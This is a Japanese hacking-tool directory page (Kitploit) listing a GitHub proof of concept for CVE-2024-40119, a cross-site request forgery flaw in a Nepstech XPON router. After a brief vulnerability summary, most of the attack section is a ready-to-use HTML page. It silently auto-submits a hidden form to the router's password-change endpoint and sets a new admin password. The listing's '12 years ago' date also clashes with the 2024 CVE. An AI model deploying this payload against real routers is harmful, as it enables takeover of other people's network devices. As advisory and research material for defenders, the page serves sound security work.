Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nepstech-xpon-router-CVE-2024-40119 — パスワード変更機能におけるクロスサイトリクエストフォージェリ(CSRF)脆弱性により、リモート攻撃者がユーザーの同意なしに管理者パスワードを変更でき、アカウント乗っ取りの可能性が生じます。 | Kitploit
ツール/GitHubGitHub/baroi-ai/nepstech-xpon-router-cve-2024-40119
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubbaroi-ai/nepstech-xpon-router-cve-2024-40119

nepstech-xpon-router-CVE-2024-40119

パスワード変更機能におけるクロスサイトリクエストフォージェリ(CSRF)脆弱性により、リモート攻撃者がユーザーの同意なしに管理者パスワードを変更でき、アカウント乗っ取りの可能性が生じます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
12年前未レビュー

nepstech-xpon-router-CVE-2024-40119

著者:

Subhodeep Baroi

CVE-2024-40119: Nepstech Wifi Router NTPL-XPON1GFEVN v1.0におけるCSRF脆弱性

説明

CVE-2024-40119は、Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 ファームウェア v2.0.1におけるクロスサイトリクエストフォージェリ(CSRF)の脆弱性です。この脆弱性により、リモートの攻撃者がユーザーの同意なしに管理者パスワードを変更でき、アカウント乗っ取りの可能性があります。

詳細

  • 脆弱性タイプ: クロスサイトリクエストフォージェリ (CSRF)
  • 製品ベンダー: Nepstech
  • 影響を受ける製品コードベース: Wifi Router xpon (端末) - モデル: NTPL-XPON1GFEVN - バージョン: 1.0 および ファームウェア: V2.0.1
  • 影響を受けるコンポーネント: ルーターWebアプリのパスワード変更機能
  • 攻撃タイプ: リモート
  • 影響: 管理者アカウントの乗っ取り

攻撃ベクトル

リモートの攻撃者は、認証されたユーザーが訪問した際にパスワード変更機能をトリガーする悪意のあるHTMLページを作成できます。以下は攻撃ベクトルのサンプルです:

root@kitploit:~
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
ツールをダウンロード